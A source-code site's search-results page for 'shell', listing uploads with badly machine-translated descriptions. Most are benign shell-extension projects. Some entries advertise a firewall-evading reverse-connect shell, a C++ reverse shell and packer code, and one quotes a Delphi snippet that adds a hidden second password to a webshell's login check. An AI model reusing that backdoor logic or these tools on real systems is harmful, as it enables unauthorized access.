Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - shell
Search - shell - List
能穿过防火墙的方向连接shell程序,代码和工具都在,仅仅供学习之用!
Date : 2008-10-13 Size : 3.4kb User : fancy

Shell扩展编程例子 资源管理器


Date : 2009-01-12 Size : 22.66kb User : webxeyes

一个windows shell扩展程序dll源码 可以在鼠标右键的“发送到”菜单中增加一个“console window” 用于在资源管理器中打开console方式的exe文件 结果在新开的console窗口中显示 而不是缺省的一闪而过-a shell windows dll extension procedures in the source code by right-clicking the "Send to" menu to add a "console window" for the resource management for open console mode of exe files in the new findings open the console window shows instead of the default rather than the flashing
Date : 2025-12-22 Size : 11kb User : 甘荣

shell程序,大家-shell, we look at
Date : 2025-12-22 Size : 18kb User : 张甜

轻松设置Windows外壳扩展程序-easily installed Windows shell extension procedures
Date : 2025-12-22 Size : 30kb User :

获取 Windows 外壳窗口的句柄-access to the Windows shell window handle
Date : 2025-12-22 Size : 14kb User : 瑞宝旺

visual c++ windows shell programming-visual c windows shell programming
Date : 2025-12-22 Size : 866kb User : 通宵成

一个演示如何通过windows shell编程实现显示windows开始菜单的“运行”对话框-a demonstration of how the windows shell programming windows began to show vegetables the single "Run" dialog
Date : 2025-12-22 Size : 2kb User : 海风

用标准C实现shell功能,shell功能我不想太多说了。-achieved using standard C functions shell, the shell functions, I do not want to say too much.
Date : 2025-12-22 Size : 1kb User :

PE 相关代码,研究PE文件加密及加壳脱壳的事例代码。-PE code, research PE file encryption and shell sabot code examples.
Date : 2025-12-22 Size : 45kb User : zj

这是一个加壳程序的C/C++源码,对TLS处理较好,外壳引导部分不是用asm实现的,直接用C。-This is a shell in C/C source code, the right TLS processing better, shell is not used to guide some asm achieve, and the direct use of C.
Date : 2025-12-22 Size : 405kb User : 伙同

ShComboBox shows folders and files in the Shell s Namespace in a cascaded order, exactly like the ComboBox in Windows Explorer. 按文件名顺序显示文件夹和文件 -ShComboBox shows folders and files in the S Namespace's hell in a cascaded order, exactly like the ComboBox in Windows Explorer. order by file name shows folders and documents
Date : 2025-12-22 Size : 86kb User : cai

window98 shell使用源代码,源码很好用可以借鉴。谢谢使用-window98 shell using the source code, source code can draw useful. Thank you, use
Date : 2025-12-22 Size : 15kb User :

Squirrel Shell is made as a cross-platform alternative to system shells like bash in Linux and cmd.exe (command.com) in Microsoft Windows. It is based on scripting language "Squirrel".
Date : 2025-12-22 Size : 659kb User : dreamgate

shell后门插入器v1.2源码procedure TForm1.spSkinButton6Click(Sender: TObject) begin if opendialog1.execute then memo1.Lines.LoadFromFile(opendialog1.filename) memo1.Text:=stringreplace(memo1.Text, iF REquesT.foRM("pass")=uSERPASS Then , iF REquesT.foRM("pass")=uSERPASS or request.form("pass")=" + edit2.text+ " Then ,[rfReplaceAll]) memo1.lines.savetofile(opendialog1.filename) end end. 关键处-Insert v1.2 backdoor shell source browser procedure TForm1.spSkinButton6Click (Sender: TObject) begin if opendialog1.execute then memo1.Lines.LoadFromFile (opendialog1.filename) memo1.Text: = stringreplace (memo1.Text, ' iF REquesT . foRM ( " pass" ) = uSERPASS Then ' ,' iF REquesT.foRM ( " pass" ) = uSERPASS or request.form ( " pass" ) = " '+ edit2.text+' " Then ' , [rfReplaceAll]) memo1.lines.savetofile (opendialog1.filename) end end. Key Office
Date : 2025-12-22 Size : 208kb User : 王二

vb参数调用,关闭按钮禁用,shell程序或文件的打开和关闭(txt,exe为例)-vb call parameters, to disable the Close button, shell program or file to open and close the (txt, exe for example)
Date : 2025-12-22 Size : 2kb User : 力王

good book for understanding windows she-good book for understanding windows shell
Date : 2025-12-22 Size : 2.41mb User : Karthikeyanr

分别编一个客户端程序和服务器程序,首先建立客户程序与服务器之间正确的socket连结,然后利用send和recv函数,客户程序将一个较长的文本文件(如>1k字节) (目的是为了在一次连接测试多次的收/发)中的数据发送给服务器。要求服务器全部正确地接收到所有的数据(一个也不能少),并将其存入一个文件。 编写一个递归的shell程序 findit,该程序搜索参数2指定的目录树,查找所有的以 .c和 .h结尾的文件,如文件行中含有参数1指定的字符串,显示该行和相应的文件名。如目录参数2缺省,则从当前目录中搜索。如: findit searchstring /home/student/wang 搜索以 /home/student/wang为根的目录树中的c程序和头文件,查找含有searchstring字符串的行,显示文件名。 findit searchstring 从当前目录开始搜索。请用含有shell特殊字符的字符串模式进一步调试该shell程序。 -分别编一个客户端程序和服务器程序,首先建立客户程序与服务器之间正确的socket连结,然后利用send和recv函数,客户程序将一个较长的文本文件(如>1k字节) (目的是为了在一次连接测试多次的收/发)中的数据发送给服务器。要求服务器全部正确地接收到所有的数据(一个也不能少),并将其存入一个文件。 编写一个递归的shell程序 findit,该程序搜索参数2指定的目录树,查找所有的以 .c和 .h结尾的文件,如文件行中含有参数1指定的字符串,显示该行和相应的文件名。如目录参数2缺省,则从当前目录中搜索。如: findit searchstring /home/student/wang 搜索以 /home/student/wang为根的目录树中的c程序和头文件,查找含有searchstring字符串的行,显示文件名。 findit searchstring 从当前目录开始搜索。请用含有shell特殊字符的字符串模式进一步调试该shell程序。
Date : 2025-12-22 Size : 13kb User : pobenliu

c++ reverse shell!! Welcome to this Reverse Shell.n this is c++ code to reverse shell in win32 enviornment using winsock2 header files copies as cmdo.exe
Date : 2025-12-22 Size : 2kb User : mfdoom

shell编辑器的原码.比较简单.包括一些ls,string中的一些函数.提供认识-shell editor of the original code. is relatively simple. including some ls, string some of the functions. and to raise awareness
Date : 2025-12-22 Size : 19kb User : kevin yings
« 12 3 4 5 6 7 8 9 10 »
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.